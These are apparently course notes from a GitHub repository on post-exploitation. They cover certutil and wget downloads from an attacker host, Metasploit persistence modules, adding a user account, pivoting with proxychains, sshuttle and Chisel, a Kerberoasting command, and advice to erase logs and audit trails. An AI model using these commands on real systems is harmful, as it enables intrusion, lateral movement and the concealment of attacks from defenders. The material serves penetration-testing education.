Skip to content

Latest commit

 

History

History
118 lines (67 loc) · 3.31 KB

23. Post Exploitation.md

File metadata and controls

118 lines (67 loc) · 3.31 KB

Post Exploitation

File Transfers Review

Certutil

certutil.exe -urlcache -f http://IP_ADDRESS/FILE.txt FILE.txt

HTTP

python -m http.server 80

Browser

Navigate directly to file

FTP

  • Start an FTP server on the attacker's machine: python -m pyftpdlib 21 (ATTACKER_IP)
  • Connect to the FTP server from the target machine: ftp 10.10.10.10

Linux

wget http://IP_ADDRESS/FILE.txt

Metasploit

Upload / Download feature

upload local_file remote_path
download remote_file local_path

Maintaining Access Overview

Persistence Scripts

run persistence -h

exploit/windows/local/persistence

exploit/windows/local/registry_persistence

Scheduled Tasks

run scheduleme

run schtaskabuse

Add a user

net user USERNAME PASSWORD /add

NOTE: These are all metasploit modules.

Pivoting

Pivoting is a technique used by attackers to move laterally within a network after gaining initial access. The goal is to explore and compromise additional systems by leveraging the initial foothold.

ProxyChains

One common tool for pivoting is proxychains. This tool routes network connections through proxy servers, allowing IP address spoofing.

To use proxychains, start by editing the configuration file at /etc/proxychains.conf.

Scroll down to [ProxyList], where you can add proxy addresses with their corresponding ports.

SSH with ProxyChains

If you have root access and want to establish an SSH connection:

ssh -f -N -D <PORT> -i <ssh-file> root@<IP-Address>

  • f: Sends SSH to the background just before command execution, avoiding an open terminal session.
  • N: Instructs SSH not to execute a remote command, useful for port forwarding.
  • D [bind_address:]port: Specifies a local "dynamic" application-level port forwarding, allowing connections to be forwarded over the secure channel.

Once executed, the connection is established in the background, and traffic can be proxied through this connection to access the network.

Examples of Usage

  • Nmap Scans: proxychains nmap <Commands>
  • Kerberoasting Attack: proxychains GetUserSPNs.py <DOMAIN NAME>/user:pass -dc-ip <DC-IP> -request
  • RDP Access: proxychains xfreerdp /u:administrator /p: 'Hacker321!' /v:10.10.10.10

SSHuttle

sshuttle allows connecting to a machine via SSH, enabling command execution without needing to prepend proxychains to each command.

Example:

sshuttle -r [email protected] 10.10.10.0/24 --ssh-cmd "ssh -i pivot"

Chisel

There’s also Chisel.

Cleaning Up

As a Red Team

Your goal is to remove any traces of your activities from the system and network logs, making it appear as if you were never there:

  • Erase entries from log files that might indicate your presence.
  • Delete any audit trails related to your actions.
  • Remove or clean up command histories, execution traces, and network traffic logs.

As a Pentester

Your objective is to help the client return their environment to its original state before the engagement:

  • Remove all executables, scripts, and files that were introduced during testing.
  • Eliminate any malware, rootkits, or additional user accounts created during the test.
  • Revert system settings and configurations to their original state.